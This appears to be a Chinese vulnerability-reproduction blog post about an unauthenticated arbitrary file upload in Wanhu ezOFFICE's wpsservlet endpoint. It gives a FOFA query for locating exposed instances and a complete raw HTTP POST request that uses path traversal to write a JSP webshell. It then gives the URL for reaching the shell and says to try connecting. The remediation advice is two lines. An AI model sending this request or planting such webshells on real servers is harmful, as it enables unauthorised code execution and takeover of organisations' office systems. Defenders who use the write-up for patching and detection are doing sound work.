万户ezOFFICE wpsservlet任意文件上传漏洞复现

0x01 产品简介

万户OA ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效提高工作效率。

0x02 漏洞概述

万户ezOFFICE协同管理平台wpsservlet接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过此漏洞上传恶意后门文件,造成代码执行或服务器失陷。

0x03 复现环境

FOFA:app="万户网络-ezOFFICE"

0x04 漏洞复现

PoC

复制代码
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=1&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=803e058d60f347f7b3c17fa95228eca6
Accept-Encoding: gzip

--803e058d60f347f7b3c17fa95228eca6
Content-Disposition: form-data; name="NewFile"; filename="1.jsp"

马子
--803e058d60f347f7b3c17fa95228eca6--

上传马子

验证url

复制代码
http://your-ip/defaultroot/platform/portal/layout/1.jsp

尝试连接

0x05 修复建议

关闭互联网暴露面或接口处设置访问权限

打补丁或升级安全版本

相关推荐
AORO_BEIDOU1 小时前
遨游科普:三防平板是什么?应用在什么场景?
网络·安全·电脑·信息与通信
独行soc1 小时前
2025年渗透测试面试题总结-安恒[实习]安全服务工程师(题目+回答)
linux·数据库·安全·web安全·面试·职场和发展·渗透测试
Swift社区2 小时前
Feature Toggle 不再乱:如何设计一个干净、安全、可控的特性开关系统?
安全
Dachui_11222 小时前
华为鸿蒙电脑发布,企业运营效率可以提高吗?
安全·华为
hao_wujing2 小时前
人工智能视角下的安全:可视化如何塑造恶意软件检测
人工智能·安全
白码低代码2 小时前
质检LIMS系统检测数据可视化大屏 全流程提效 + 合规安全双保障方案
安全·信息可视化·lims·实验室管理系统
AORO_BEIDOU2 小时前
遨游科普:三防平板是什么?有什么作用?
5g·安全·智能手机·电脑·信息与通信
厦门辰迈智慧科技有限公司3 小时前
大中型水闸安全监测系统解决方案
运维·服务器·安全
观测云3 小时前
整合安全能力:观测云进一步强化数据价值
安全
行止63 小时前
系统安全及应用
linux·运维·安全